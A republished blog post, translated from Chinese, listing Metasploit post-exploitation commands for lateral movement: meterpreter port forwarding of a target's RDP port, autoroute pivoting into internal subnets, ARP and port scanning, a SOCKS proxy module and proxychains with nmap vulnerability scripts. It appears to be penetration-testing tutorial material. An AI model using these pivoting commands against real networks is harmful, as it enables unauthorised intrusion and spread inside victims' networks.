当前位置:网站首页>MSF horizontal MSF port forwarding + routing table +socks5+proxychains
MSF horizontal MSF port forwarding + routing table +socks5+proxychains
2022-07-06 17:58:00 【West Lake first sword】
MSF Some operations of post infiltration
Port forwarding
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 # Put the target machine 172.16.1.156 Of 3389 Port forwarding to local 2222 port
meterpreter > portfwd list # View the forwarding list
meterpreter > portfwd flush # Clear the forwarding list
rdesktop 127.0.0.1:2222 #kali Remote desktop use 2222 port
Add route , Lateral penetration ( Cross segment attack )
run autoroute -s 172.16.2.0/24 # Add to target environment network
run autoroute –p # View added routes
route print # Print route
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 # Scan the whole segment
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 # Check IP Whether open 3389
utilize arp Scan intranet hosts
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
Socks Agency
New version of the msf Different from the old version , The agent module is also different .
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
To configure proxychains
Use agent software to connect established socks Tunnel , You can successfully access the intranet .
vi /etc/proxychains.conf # add to socks5 127.0.0.1 7777
proxychains+nmap Scan the host for vulnerabilities
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
proxychains Use msf frame
proxychains msfconsole
边栏推荐
- 开源与安全的“冰与火之歌”
- JMeter interface test response data garbled
- Single responsibility principle
- sql语句优化,order by desc速度优化
- Appium automated test scroll and drag_ and_ Drop slides according to element position
- 2022年大厂Android面试题汇总(一)(含答案)
- OpenEuler 会长久吗
- 基本磁盘与动态磁盘 RAID磁盘冗余阵列区分
- 2022年大厂Android面试题汇总(二)(含答案)
- 【MySQL入门】第三话 · MySQL中常见的数据类型
猜你喜欢
Kivy tutorial: support Chinese in Kivy to build cross platform applications (tutorial includes source code)
FMT开源自驾仪 | FMT中间件:一种高实时的分布式日志模块Mlog
Unity tips - draw aiming Center
node の SQLite
Optimization of middle alignment of loading style of device player in easycvr electronic map
The easycvr authorization expiration page cannot be logged in. How to solve it?
Spark calculation operator and some small details in liunx
Alibaba brand data bank: introduction to the most complete data bank
BearPi-HM_ Nano development board "flower protector" case
sql语句优化,order by desc速度优化
随机推荐
adb常用命令
Appium automated test scroll and drag_ and_ Drop slides according to element position
Spark calculation operator and some small details in liunx
编译原理——自上而下分析与递归下降分析构造(笔记)
QT中Model-View-Delegate委托代理机制用法介绍
The art of Engineering (2): the transformation from general type to specific type needs to be tested for legitimacy
高精度运算
Pyspark operator processing spatial data full parsing (5): how to use spatial operation interface in pyspark
10 advanced concepts that must be understood in learning SQL
Kernel link script parsing
VR全景婚礼,帮助新人记录浪漫且美好的场景
分布式不来点网关都说不过去
ASEMI整流桥DB207的导通时间与参数选择
Kivy tutorial: support Chinese in Kivy to build cross platform applications (tutorial includes source code)
酷雷曼多种AI数字人形象,打造科技感VR虚拟展厅
IP, subnet mask, gateway, default gateway
The easycvr authorization expiration page cannot be logged in. How to solve it?
Optimization of middle alignment of loading style of device player in easycvr electronic map
Interview shock 62: what are the precautions for group by?
[getting started with MySQL] fourth, explore operators in MySQL with Kiko